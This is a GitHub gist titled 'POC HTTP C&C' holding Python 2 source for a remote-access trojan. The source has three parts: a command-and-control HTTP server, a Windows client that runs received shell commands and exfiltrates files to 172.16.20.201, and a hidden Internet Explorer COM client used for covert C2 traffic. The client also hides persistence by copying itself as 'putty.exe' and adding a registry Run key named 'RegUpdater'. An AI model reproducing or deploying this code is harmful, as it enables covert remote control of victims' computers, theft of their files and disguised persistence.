Skip to content

Instantly share code, notes, and snippets.

@macostag
Created May 7, 2018 03:42
Show Gist options
  • Select an option

  • Save macostag/159bec1334599cbb846ceaf079b1dae3 to your computer and use it in GitHub Desktop.

Select an option

Save macostag/159bec1334599cbb846ceaf079b1dae3 to your computer and use it in GitHub Desktop.
POC HTTP C&C
# HTTP SERVER
#--------------------------------------------
import BaseHTTPServer
import os, cgi
HOST_NAME = '172.16.20.201'
PORT_NUMBER = 80
class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(s):
command = raw_input("Shell> ")
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(command)
def do_POST(s):
if s.path == '/info':
try:
ctype, pdict = cgi.parse_header(s.headers.getheader('content-type'))
if ctype == 'multipart/form-data' :
fs = cgi.FieldStorage( fp = s.rfile,headers = s.headers,environ={ 'REQUEST_METHOD':'POST' })
else:
print "[-] Unexpected POST request"
fs_up = fs['file']
with open('/root/Desktop/1', 'wb') as o:
o.write( fs_up.file.read() )
s.send_response(200)
s.end_headers()
except Exception as e:
print e
return
s.send_response(200)
s.end_headers()
length = int(s.headers['Content-Length'])
postVar = s.rfile.read(length )
print postVar
if __name__ == '__main__':
server_class = BaseHTTPServer.HTTPServer
httpd = server_class((HOST_NAME, PORT_NUMBER), MyHandler)
try:
httpd.serve_forever()
except KeyboardInterrupt:
print '[!] Server is terminated'
httpd.server_close()
#HTTP CLIENT
#--------------------------------------------
import requests
import subprocess
import os
import time
import shutil
import _winreg as wreg
import random
def httpConnect():
while True:
req = requests.get('http://172.16.20.201')
command = req.text
if 'terminate' in command:
return 1
elif 'grab' in command:
grab,path=command.split('*')
if os.path.exists(path):
url = 'http://172.16.20.201/info'
files = {'file': open(path, 'rb')}
r = requests.post(url, files=files)
else:
post_response = requests.post(url='http://172.16.20.201', data='[-] Not able to find the file !')
elif 'persistence' in command:
path = os.getcwd().strip('/n')
Null,userprof = subprocess.check_output('set USERPROFILE', shell=True).split('=')
destination = userprof.strip('\n\r') + '\\Documents\\' +'putty.exe'
if not os.path.exists(destination):
shutil.copyfile(path+'\putty.exe', destination)
key = wreg.OpenKey(wreg.HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Run",0,wreg.KEY_ALL_ACCESS)
wreg.SetValueEx(key, 'RegUpdater', 0, wreg.REG_SZ,destination)
key.Close()
post_response = requests.post(url='http://172.16.20.201', data="[*] Persistence completed!")
elif 'cd' in command:
code,directory = command.split(' ')
os.chdir(directory)
cwd="[+] CWD is " + os.getcwd()
post_response = requests.post(url='http://172.16.20.201', data=cwd)
else:
CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
post_response = requests.post(url='http://172.16.20.201', data=CMD.stdout.read())
post_response = requests.post(url='http://172.16.20.201', data=CMD.stderr.read())
time.sleep(3)
#def main():
while True:
try:
if httpConnect() == 1:
break
except:
sleep_for = random.randrange(1, 10)
print "[*] Error to connect C&C server trying to connect in :" + str(sleep_for) + "seconds..."
pass
#if __name__ == "__main__":
# main()
#IE COM CLIENT
#--------------------------------------------
from win32com.client import Dispatch
from time import sleep
import subprocess
ie = Dispatch("InternetExplorer.Application")
ie.Visible = 0
dURL = "http://172.16.20.201"
flags = 0
targetFrame = ""
while True:
ie.Navigate("http://172.16.20.201")
while ie.ReadyState != 4:
sleep(1)
command = ie.Document.body.innerHTML
command = unicode(command)
command = command.encode('ascii','ignore')
print ' [+] Get command: ' + command
if 'terminate' in command:
ie.Quit()
break
else:
cmd = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
data = cmd.stdout.read()
postData = buffer(data)
ie.Navigate( dURL, flags, targetFrame, postData )
sleep(3)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment